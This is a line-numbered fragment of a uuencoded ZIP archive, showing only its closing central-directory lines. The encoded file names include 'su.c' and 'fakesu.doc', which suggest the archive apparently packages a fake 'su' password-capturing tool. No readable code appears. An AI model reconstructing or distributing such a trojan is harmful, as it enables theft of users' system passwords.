  12213. M$_]"?!7QR,B6;Z36*[[S9>JR'&WUF<;Q+_55"G)6MS=^/"WG!F&R/)0;/%B_
  12214. MDELMW'TY3">G>UH.TRH*]N6Z_6]MY[1<H%YPC/;D!N->ZU=Y24+O("_#@=5J
  12215. MGY8K[L=6SIS`TW*F@^S+?;^S[^U?./K3EW-YX*D1G'3[+:O["X<+XOPN()4D
  12216. M%!(:/[_'4LL]=55N&NC+R"SZ+WI-C6QN*]'<H+>I,%V?JPJ3,0FY7YG70O$-
  12217. MOPHR@R94<<J7/^>65]]HPRSF*80!D(TEP9W-->_,C*5DR:_ZQ$\T24Q\A?E4
  12218. ME$7'E1[&++"`B]&=ZATH+7]2L]&XK%_4FM?7%Z31#LWKK_I5_:+>I)6+GG_5
  12219. MP-0-,>Z:5U>_U_#U*04+&P1A($:I4=J.JM)UR2`)DT>-&3TP,W.;R5CMY0\Q
  12220. M!T+K]&T?O)7+%08C#SNP,F+F`10H!"!*NO`ZDV?)W\9**7TWQG!D\RYKH=#1
  12221. M?06_.;<\_E6T9(4F[!0U[U5'VNPV&U`Q%5$SH6'>75<*-YS)(,76`Z<_ZG,1
  12222. M,2#=="T\+5O17%>(OQE*ITWM\'FYD@/M_*8P<H%Q/,X@XNMUARBB&'NF<Z2?
  12223. M0M@T>;L8-LU2`:>:2V-Z*VB/4HF\OVJ^E+%`N852F@/[5ZEK".8.R5-];?*4
  12224. MSQIJ]ZQ;6(5?!;MO`<"E0<]O<^V3\@A3N<)#.L8/2I?;'I^^=8*8ST]]M<00
  12225. MSH5WZ>4[\U^5[F2$&H6C>PYFVE[3=*!E7W3/7?[>1/Q_4$L!`A4#%`````@`
  12226. M+R)$(G7:3PX=#```.3````@`#````````0``0*2!`````&-O;F9I9RYH55@(
  12227. M`).C^#*Z#/<R4$L!`A4#%`````@`\WM%(H>YN^Z.!```M`D```<`#```````
  12228. M`0``0*2!4PP``&5R<F]R+FA56`@`IJ/X,CG\^#)02P$"%0,4````"`"Z3$4B
  12229. MU8;>3X("``#.!```"@`,```````!``!`I($6$0``9F%K97-U+F1O8U58"`!/
  12230. MJ?@R3ZGX,E!+`0(5`Q0````(`.-[12*[JQGC(@@``$X6```,``P```````$`
  12231. M`$"D@=`3``!L:6)G971T97AT+FA56`@`NZ/X,AG\^#)02P$"%0,4````"`#H
  12232. M>T4BNZL9XR((``!.%@``"0`,```````!``!`I($L'```;&EB:6YT;"YH55@(
  12233. M`,RC^#(C_/@R4$L!`A4#%`````@`(7Q%(CD1D)-P!P``5A(```0`#```````
  12234. M`0``0*2!A20``'-U+F-56`@`WJ/X,H[\^#)02P$"%0,4````"``[?$4B?@._
  12235. M]#0)``!/%P``"``,```````!``!`I($G+```<WES=&5M+FA56`@`[:/X,L+\
  12236. 8^#)02P4&``````<`!P#0`0``D34`````
  12237. `
  12238. end
  12239.